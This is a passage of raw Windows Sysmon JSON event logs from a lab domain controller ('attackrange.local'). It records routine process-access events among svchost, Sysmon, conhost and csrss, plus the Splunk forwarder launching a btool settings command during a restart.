07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2926,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2927,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nTargetProcessId: 2584\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-00106D380500}","TargetProcessId":"2584","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2928,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.882\r\nProcessGuid: {41C8662E-1FEF-5F25-0000-0010A1390500}\r\nProcessId: 2732\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nParentProcessId: 2584\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.882","ProcessGuid":"{41C8662E-1FEF-5F25-0000-0010A1390500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FEF-5F25-0000-00106D380500}","ParentProcessId":"2584","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2929,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nSourceProcessId: 2584\r\nSourceThreadId: 3476\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-0010A1390500}\r\nTargetProcessId: 2732\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1FEF-5F25-0000-00106D380500}","SourceProcessId":"2584","SourceThreadId":"3476","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-0010A1390500}","TargetProcessId":"2732","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2930,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-0010A1390500}\r\nTargetProcessId: 2732\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-0010A1390500}","TargetProcessId":"2732","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2931,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2932,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2933,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2934,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 